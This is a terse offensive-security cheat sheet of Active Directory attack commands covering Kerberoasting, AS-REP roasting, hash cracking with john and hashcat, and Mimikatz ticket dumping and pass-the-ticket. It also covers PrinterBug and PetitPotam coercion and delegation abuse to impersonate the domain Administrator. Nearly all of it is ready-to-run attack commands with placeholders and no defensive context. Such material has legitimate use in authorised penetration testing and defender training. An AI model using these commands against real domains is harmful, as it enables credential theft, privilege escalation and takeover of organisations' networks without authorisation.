Neko

Active Directory Lateral Movement

Cheat Sheet

Last updated: March 5th, 2023

Kerberoasting

Found SPN

Extract Hash

#Specific Account
Rubeus.exe kerberoast /user:{USER} /rc4opsec /outfile:hashes.txt
Request-SPNTicket -SPN "{SPN}" -OutputFormat {Hashcat:John} | % {$_.Hash} > hashes.txt
impacket-GetUserSPNs -request -dc-ip {Full.domain}/{USER}:{PASS} -request-user {USER} -outputfile hashes.txt
#All Accounts
Invoke-Kerberoast -OuputFormat {Hashcat:John} | % {$_.Hash} > hashes.txt
Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat {hashcat:john} > hashes.txt
Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
crackmapexec ldap DC-IP -u {USER} -P {PASS} --kerberoasting hashes.txt
impacket-GetUserSPNs -request -dc-ip {IP} {Full.domain}/{USER}:{PASS} -outputfile hashes.txt
kerberos::list /export #from mem to disk

Cracking Hashes

john --wordlist=wordlist.txt hashes.txt
hashcat -m 13100 --force -a 0 hashes.txt {wordlist.txt}

Set SPN

Set-DomainObject -Identify {USER} -Set @{serviceprincipalname='Service/Name'}

Kerberos Delegation

Unconstrained Delegation

Basic

#Dumping Tickets
Invoke-Mimikatz -Command '''sekurlsa::tickets /export'''

#Using Tickets
Invoke-Mimikatz -Command '''kerberos::ptt {C:\Path\To\Ticket}'''

Using Exploits

#Ticket Monitoring
Rubeus.exe monitor /interval:5 /nowrap

#Running Exploits
.\MS-RPN.exe \\dc.domain.com \\VulnMachine.domain.com #PrinterBug
.\PetitPotam.exe {VulnPC} {DC}

#Using Tickets
Rubeus.exe ptt /ticket:{base64 Ticket}

Constrained Delegation

#mimi + kekeo
kekeo# tgt::ask /user:{USER} /domain:{full.domain.com} /rc4:{HASH} #request tgt
kekeo# tgs::s4u /tgt:{TGT-File}.kiribi /user:Administrator@Domain.com /service:{CIFS}/{PC.Domain.com} #request tgs
Invoke-Mimikatz -Command '''kerberos::ptt {TICKET}.kiribi'''

#rubeus
Rubeus.exe s4u /user:websvc /aes256:{USER AES} /impersonateuser:Administrator /msdsspn:service/pc.domain.com /ptt

Resource Based

Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount {PWNedHost$}
Rubeus.exe s4u /user:{PWNED}$ /aes256:{PC$ aes256} /msdsspn:{SVC}/{SVCMACHINE} /impersonateuser:administrator /ptt

AREPRoasting

Dumping Hashes

#specific account
Get-ASREPHash -UserName {user} -Verbose

#all acounts
Rubeus.exe asreproast /format:{hashcat:john} /outfile:hashes
crackmapexec ldap DC-IP -u {user} -p {pass} --asreproast hashes.txt
##getnpusers
###with creds
impacket-getnpusers -request -dc-ip {ip} {full.domain}/{user}:{password} -format {hashcat:john} -outputfile hashes.txt
###with users
impacket-getnpusers -request -dc-ip {ip} --usersfile -users.txt {full.domain}/ -format {hashcat:john} -outputfile hashes.txt

Cracking Hashes

john --wordlist={wlpath} hashes.txt
hashcat -m 18200 --force -a 0 hashes.txt {wlpath}